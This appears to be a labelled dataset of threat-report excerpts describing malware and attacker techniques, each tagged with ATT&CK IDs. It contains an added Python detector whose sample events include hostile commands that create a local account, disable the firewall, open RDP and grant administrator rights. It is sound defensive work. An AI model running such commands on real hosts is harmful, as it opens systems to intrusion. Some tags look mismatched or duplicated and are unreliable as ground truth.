{"text1":"Also, the postinstall script moves the .CrashReporter program to a new location \/Library\/JMTTrader\/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004","labels":"['T1059.004']"}
|
|
{"text1":"The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github","labels":"['T1102.002']"}
|
|
{"text1":"The bot attempts to create a MUTEX using the value of variable \u201cVL\u201d to ensure that only one instance of the bot is running. The bot will proceed to create a copy of itself as %TEMP%\/svchost.exe, execute that file, and terminate itself. The newly executed copy will create an autostart registry key to ensure persistence upon system reboot","labels":"['T1547.001']"}
|
|
{"text1":"We will discuss the Spark backdoor\u2019s functionality in detail later in this blog, but this specific sample has the following configuration","labels":"['T1027.002']"}
|
|
{"text1":"The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators","labels":"['T1124', 'T1082', 'T1069.002']"}
|
|
{"text1":"Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"%PUBLIC%\\svchost32.exe","labels":"['T1059.003', 'T1059.001']"}
|
|
{"text1":"The script \u201cenu.cmd\u201d created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name \u201cadministrator\u201d in Spanish, Italian, German, French, and English","labels":"['T1562.004', 'T1098']"}
|
|
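Command-line detection for the enu.cmd behaviour in the record above (a local account created, the host firewall disabled, TCP/3389 opened, the account added to the administrators group), as an added example that is not from the report. The process-creation records are constructed and the patterns are mine. The group-membership rule deliberately does not key on the group name, because the record shows that name is localized.

```python
"""Correlate net/netsh command lines into an enu.cmd-style alert.

Added example for the enu.cmd record; not from the report. Events are constructed,
patterns are mine. Sources would be 4688 / Sysmon 1 command-line fields.
"""
import re
from collections import defaultdict

RULES = {
    "account_created": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I),
    "firewall_disabled": re.compile(
        r"\bnetsh(?:\.exe)?\s+(?:advfirewall\s+set\s+\w+\s+state\s+off"
        r"|firewall\s+set\s+opmode\s+(?:mode=)?disable)\b", re.I),
    "rdp_port_opened": re.compile(
        r"\bnetsh(?:\.exe)?\s+(?:advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=3389\b"
        r"|firewall\s+add\s+portopening\s+\S+\s+3389\b)", re.I),
    # Group name left unconstrained on purpose: Administrators / Administradores / Administratoren / ...
    "added_to_admins": re.compile(
        r'\bnet1?(?:\.exe)?\s+localgroup\s+(?:"[^"]*"|\S+)\s+\S+\s+/add\b', re.I),
}


def match_rules(cmdline: str) -> set:
    """Names of every rule the command line trips."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}


def correlate(events) -> dict:
    """events: iterable of (host, command_line). Returns host -> set of rule names seen."""
    seen = defaultdict(set)
    for host, cmd in events:
        seen[host] |= match_rules(cmd)
    return seen


def alerts(events, min_rules: int = 3) -> list:
    """Hosts with at least min_rules distinct behaviours. Any one of them is noisy on
    its own (admins do create accounts); the combination is the script's signature."""
    return sorted(h for h, names in correlate(events).items() if len(names) >= min_rules)


# Constructed process-creation records: (host, command line).
SAMPLE_EVENTS = [
    ("WS-17", "net user supportadm P@ssw0rd123 /add"),
    ("WS-17", "netsh advfirewall set allprofiles state off"),
    ("WS-17", 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'),
    ("WS-17", "net localgroup Administradores supportadm /add"),
    ("WS-17", "net localgroup Administrators supportadm /add"),
    ("WS-02", "net user /domain"),
    ("WS-02", "netsh advfirewall show allprofiles"),
    ("WS-02", "net localgroup"),
]

if __name__ == "__main__":
    for host, names in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(names))
    print("alert on:", alerts(SAMPLE_EVENTS))
```

The script's trick of trying the group name in five languages is exactly why matching on the name is fragile; the `/add` to any local group within minutes of an account creation and a firewall change is the durable signal.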
{"text1":"As we can see, the flow is obfuscated. But in Pony this technique is used in a more sophisticated way because\u00a0there are some junk instructions added between the PUSH and the RET, in addition to a never-executed bogus conditional jump","labels":"['T1027']"}
|
|
{"text1":"Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request","labels":"['T1113']"}
|
|
{"text1":"If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing technique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based algorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different keys","labels":"['T1027', 'T1497.001']"}
|
|
{"text1":"As mentioned in the table above, version 3 has two forms - one is an independent executable, and the other is a loader that loads a DLL from the resources section and executes it. Even before doing any static \/ dynamic analysis, we can use VirusTotal to determine that the resources section probably contains more data, in this case an encrypted DLL that is loaded into memory","labels":"['T1055.001']"}
{"text1":"As noted, there are two distinct variants of ServHelper: a \u201ctunnel\u201d variant and a \u201cdownloader\u201d variant. The \u201cdownloader\u201d variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader","labels":"['T1021.001']"}
{"text1":"BoomBox proceeds to upload the data above (masquerading as a PDF file) to a dedicated-per-victim-system folder in Dropbox. For demonstration purposes, an example HTTP(s) POST request used to upload the file\/data to Dropbox is included below","labels":"['T1567.002']"}
{"text1":"Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim\u2019s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker","labels":"['T1124', 'T1119', 'T1041']"}
{"text1":"The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings","labels":"['T1016', 'T1082']"}
{"text1":"The exact date when the malware was compiled is unknown \u2013 the recent wrapper DLL samples were tampered with by the malware authors, with the PE timestamps manually set to zero values. However, during our research, we found an earlier version of the malware with a PE timestamp reading Oct 13, 2013, so the compilation date of the later version is almost surely more recent","labels":"['T1070.006']"}
{"text1":"PowerShell Cobalt Strike Beacon -\u00a0New payload + new C2 domain - PowerShell Obfuscator -\u00a0All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper -\u00a0A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper -\u00a0Inspired by known Outlook credentials dumpers. Mimikatz -\u00a0PowerShell and Binary versions, with multiple layers of obfuscation","labels":"['T1003.001']"}
{"text1":"Any other command that doesn\u2019t fit the above patterns will be forwarded and processed as an argument to \u2018cmd.exe \/c\u2019 and run via the \u2018ShellExecuteW\u2019 API. Additionally, each beacon is accompanied with a screenshot that is initially saved as \u2018scr.jpg\u2019 in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the \u2018uploadsf\u2019 command","labels":"['T1106']"}
{"text1":"The malware uses the AMAP SDK to get accurate location of infected devices by GPS, mobile network (such as base stations), WiFi and other information. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. All C2 communications are encrypted with the AES algorithm using a key generated by computing five MD5 hashes starting with the key \"1qazxcvbnm\", and adding a salt value of \u201c.)1\/\u201d in each iteration","labels":"['T1082']"}
{"text1":"In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution","labels":"['T1027.005']"}
{"text1":"The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request","labels":"['T1033']"}
{"text1":"Note that the heading of the message box is \u2018ASKOD\u2019, a reference to the Ukrainian electronic document management system. This initiative is meant to enforce electronic digital signatures through the use of cryptographic keys like the \u0410\u043b\u043c\u0430\u0437-1\u041a (transliterated as \u2018Almaz-1K\u2019 or translated to \u2018Diamond-1K\u2019) shown below","labels":"['T1036']"}
{"text1":"It then executes a new instance of itself in a new process. Also, it will remove the original file via the following command that is executed in a batch script named 'date.bat","labels":"['T1059.003', 'T1059.003']"}
{"text1":"The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives","labels":"['T1486', 'T1564.006']"}
{"text1":"The library used to hide Winnti\u2019s system activity is a copy of the open-source userland rootkit Azazel\u00b9\u2070, with minor changes. When executed, it will register symbols for multiple commonly used functions, including: open(), rmdir(), and unlink(), and modify their returns to hide the malware\u2019s operations","labels":"['T1014']"}
{"text1":"The arp.exe command is used to display and modify entries in the Address Resolution Protocol (ARP) cache. Adversaries may attempt to use the command to discover remote systems they could compromise","labels":"['T1018']"}
{"text1":"We refer to these attacks as MuddyWater due to the confusion in attributing these attacks. Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related. The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. These attacks have also been tracked by several other researchers on Twitter and elsewhere. The activity has been consistent throughout 2017 and, based on our analysis, targets or is suspected to target, entities in the following countries","labels":"['T1027', 'T1027']"}
{"text1":"FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a \u201c<hex digits>.dat\u201d file (e.g. C:\\ProgramData\\21851a60.dat\u201d). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode","labels":"['T1027']"}
{"text1":"Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies","labels":"['T1539']"}
{"text1":"Once the threat actor mapped the network and obtained credentials (through net use), they began to move laterally. The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets","labels":"['T1047']"}
{"text1":"In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY","labels":"['T1566.001']"}
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma. The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. TLP: WHITE https:\/\/www.us-cert.gov\/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. It starts from the tenth byte in the data section of the initial TCP POST request. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. We determined that the binary was packed because we did not see the C2 URL or any signs of being an information stealer (such as an applications list) in the binary strings and resources","labels":"['T1555']"}
{"text1":"Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. This backdoor can only execute additional PowerShell scripts. It writes the command results in another OneDrive subfolder and encrypts it with the XOR key 0xAA","labels":"['T1059.001']"}
{"text1":"During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it","labels":"['T1072']"}
{"text1":"Through the use of this platform, the operator was able to monitor and manage various compromised email accounts simultaneously","labels":"['T1586.002']"}
{"text1":"As seen in Figure 7, this .NET executable uses a GitHub repository to obtain and execute a downloader. This repository is now gone, but we were able to download a copy of it while it was still available","labels":"['T1102']"}
{"text1":"Along with the change to using a DLL, Qbot also changed where it stores configuration information on the infected host. Earlier versions of Qbot stored this data within a DAT file in the same randomly named folder as the malicious binary. As of late 2020, this data is now stored in the registry, under a randomly named subkey under HKCU\\Software\\Microsoft. While this move to the registry keeps things a bit more hidden from prying eyes, in both cases the presence of a randomly named value under the Microsoft folder\/key should be cause to investigate","labels":"['T1112']"}
{"text1":"Mandiant has created a\u202ftask force & initiated a Global Event\u202fto track the Russian invasion of Ukraine. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. There are several similarities and technical overlaps between the 14 November 2018, phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. For example, the use of 'FromBase'+0x40+'String', in place of FromBase64String, the PowerShell command used to decode base64. The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content","labels":"['T1059.001']"}
{"text1":"The Emissary configuration is now encrypted using a custom algorithm that uses the \"srand\" function to seed the \"rand\" function using a value of 2563. This seed value causes the \"rand\" function to generate the same values each time, which Emissary will use as a key along with the XOR operation. The configuration now contains the version number of Emissary, instead of the version being hardcoded into the Trojan","labels":"['T1027']"}
{"text1":"Actors behind Agent Tesla campaigns have also used malicious Office documents to facilitate first-stage delivery. Specially-crafted documents, exploiting Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570, have been leveraged, even in present day campaigns. These and similar exploits allow for quick delivery and execution with minimal user interaction (beyond opening the malicious documents and allowing active content to proceed","labels":"['T1203']"}
{"text1":"The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server","labels":"['T1074.001']"}
{"text1":"Using previously stolen credentials the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility. Downloaded utilities were copied to C:\\Windows\\SysWOW64\\. - The attacker performed host and network reconnaissance using built-in Windows commands. AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2). - This process was performed twice on the same domain controller, 10 hours apart. Between executions of Adfind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk. The attacker logged into a domain controller and copied instances of PSExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system. Using PsExec the attacker copied the process\/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed. The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers","labels":"['T1018']"}
{"text1":"Summary In the past few months, Unit 42 has observed the Patchwork group, alternatively known as Dropping Elephant and Monsoon, conducting campaigns against targets located in the Indian subcontinent. Patchwork threat actors utilized a pair of EPS exploits rolled into legitimate, albeit malicious, documents in order to propagate their updated BADNEWS payload. The use of weaponized legitimate documents is a longstanding operational standard of this group. The BADNEWS malware payload, which these malicious documents ultimately deliver, has been updated since the last public report in December 2017. These changes to BADNEWS, as well as the use of recent EPS-based exploits, demonstrate that the group are actively updating their toolsets in efforts to stay ahead of the security community. In this posting, we detail our findings and document these changes. Delivery The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities. Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability. The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below","labels":"['T1203']"}
{"text1":"1) Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels","labels":"['T1110.001']"}
{"text1":"Sakula obfuscates many of its strings using single-byte XOR obfuscation. Samples with a 2012 compile timestamp use a key value of either 0x88 or 0x56. Samples compiled in 2013 and 2014 use a key value of 0x56, while the lone 2015 sample uses 0x57","labels":"['T1027']"}
{"text1":"We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It\u2019s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn\u2019t entirely clear at this time","labels":"['T1106']"}
{"text1":"A base working directory will contain the files\/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding \u201cWindowsApps","labels":"['T1074.001']"}
{"text1":"Kimsuky\u00a0employs a wide variety of malware such as Gold Dragon, Babyshark, Appleseed, etc. The module meant for exfiltrating files from the endpoint uses a distinct filepath list specified by the threat actors.Organizations must remain vigilant against motivated adversaries that conduct targeted attacks","labels":"['T1583.006']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. DGet \u2014 This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use downloaders or other malware to send the new list to a compromised host. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1105']"}
{"text1":"The goal of targeting some victims appears to be to obtain data. How this data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve data from memory of systems where such data is typically processed","labels":"['T1119']"}
{"text1":"SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots","labels":"['T1036.005', 'T1053.005']"}
{"text1":"The downloaded file named install_flash_player.exe needs to be manually launched by the victim. To operate correctly, it needs elevated administrative privileges which it attempts to obtain using the standard UAC prompt. If started, it will save the malicious DLL as C:Windowsinfpub.dat and launch it using rundll32","labels":"['T1218.011']"}
{"text1":"The data is encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library","labels":"['T1573.001']"}
{"text1":"If the user account doesn\u2019t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin\u2019s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike\u2019s built-in Mimikatz to dump its password hashes","labels":"['T1087.002']"}
{"text1":"The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The macro sleeps for two seconds and then executes the newly dropped executable. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and\/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload. We believe Sofacy used this tool, as the macro within their delivery document closely resembles the macros found within Luckystrike. To confirm our suspicions, we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy's delivery document. We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload","labels":"['T1140']"}
{"text1":"The first thing this malware does is it copies itself to the startup directory for persistence","labels":"['T1547.001']"}
{"text1":"In this blog post, we provide an in-depth analysis of Linux\/Ebury. It is a sophisticated backdoor used to steal OpenSSH credentials and maintain access to a compromised server. According to previous reports, this backdoor has been in the wild for at least two years. Linux\/Ebury comes in two different shapes: a malicious library and a patch to the main OpenSSH binaries. The malicious library is a modified version of libkeyutils.so. This shared library is loaded by all OpenSSH executables files such as ssh, sshd and ssh-agent. We will describe how the backdoor works and how the OpenSSH functionalities are hooked","labels":"['T1554']"}
{"text1":"Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. The macro dropped the implant to the disk, setting up persistence mechanisms and eventually executing the payload on the infected endpoint. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. The malicious domain prompts the victim to enter their name and email address to sign up and download a seemingly important \"guide on pay and allowance","labels":"['T1608.004']"}
{"text1":"It uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex as well as its registry hive in the affected machine. It uses the value\u00a0tcpClient_0 as its HTTP server, where it will receive all stolen information from the infected machine. However, since the value was set to null, all stolen information will be sent to the same C&C server","labels":"['T1041']"}
{"text1":"The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame\u2019s completeness \u2013 the ability to steal data in so many different ways","labels":"['T1123']"}
{"text1":"PipeMon\u2019s first stage consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher. Once written to disk, the RARSFX is executed with CreateProcess by providing the decryption password in an argument, as follows","labels":"['T1106']"}
{"text1":"Finally, after the initial beaconing, receiving a configuration, and exfiltrating stolen information from the infected machine, AZORult may download the next payload. For example, in the campaign described at the beginning of this post, AZORult downloads Hermes 2.1 ransomware after it exfiltrates the victim\u2019s data and credentials","labels":"['T1105']"}
{"text1":"While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object","labels":"['T1497.002']"}
{"text1":"The Bazar Loader malware was using a code signing certificate signed by Digicert under the organization NOSOV SP Z O O","labels":"['T1588.003']"}
{"text1":"The sample checks that the machine is domain joined and retrieves the domain name before execution continues. A userID is generated by computing the MD5 of a network interface MAC address that is up and not a loopback device, the domain name, and the registry value HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid","labels":"['T1016']"}
{"text1":"The worm also includes code to scan for open Docker API\u2019s using masscan, then spin up docker images and install itself","labels":"['T1046']"}
{"text1":"The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer","labels":"['T1036']"}
{"text1":"Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control (UAC) bypass on both 32 and 64-bit systems. Analysis . CTU researchers performed detailed analysis on 346 Sakula samples, including the installer and all dropped files used by the malware to run. Source: Dell SecureWorks) . Installation . In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe: The registry value and filename vary by sample. Three of the analyzed samples placed files in %APPDATA%, while the remaining Sakula samples placed files in a directory under %ALLUSERSPROFILE%. A small number of samples did not use an additional subdirectory. The msi.dll file is configured to read and XOR-decode setup.msi, also located in the same directory, and run it in memory. Based on whether the compromised system is 32-bit or 64-bit, the appropriate file is written and run using cmd.exe calling rundll32 on the DLL with the PlayWin32 or PlayWin64 export. Center509671.dat). In a small group of Sakula samples from 2013, the install process also modified the hosts file to point some of the victim's subdomains to various IP addresses within the victim's own organization. The malware also registered a file as a command component within the registry. In the Sakula samples where the install process performed cleanup, the malware invoked cmd.exe","labels":"['T1059.003']"}
{"text1":"The initial attack did not produce the desired result; The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender\u2019s Real-Time Monitoring feature","labels":"['T1562.001']"}
{"text1":"The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below","labels":"['T1560.003']"}
{"text1":"Since version 0.2.6 This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user\u2019s SID and server password","labels":"['T1558.002']"}
{"text1":"The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page","labels":"['T1201']"}
|
|
{"text1":"In addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function","labels":"['T1056.001']"}
|
|
{"text1":"After the anti-analysis checks are complete, the loader starts preparing the infected environment for the download of additional payloads. There are three download attempts (and thus three GET requests, each trailed by a different numeric ID); the payloads are downloaded in turn to the user\u2019s %temp% folder","labels":"['T1071.001']"}
|
|
{"text1":"In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette","labels":"['T1566.002']"}
|
|
{"text1":"Putty \u2013 can be leveraged by attackers for remote access, to exfiltrate data and send it back to attackers - PSExec \u2013 is a legitimate Microsoft tool that can be exploited by malicious actors and used for lateral movement across victim networks - SNScan \u2013 this tool can be used for network reconnaissance, to find other potential targets on victim networks - WinRAR \u2013 is an archiving tool that can be used to compress files (potentially to make them easier to send back to attackers) and also to extract files from zipped folders","labels":"['T1046']"}
|
|
{"text1":"In order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious payload inside an allowlisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in the memory as they are executed","labels":"['T1055.012']"}
|
|
{"text1":"The PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. PowerShell downloader The downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. Beginning of the \"download and load\" shellcode The shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code","labels":"['T1027']"}
|
|
{"text1":"For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose","labels":"['T1546.003']"}
|
|
{"text1":"The communication between the cryptojacking bot and its mining server is made by using the Stratum protocol on port 10001 and is controlled by the execution of the spreadXfghij.exe program","labels":"['T1071']"}
|
|
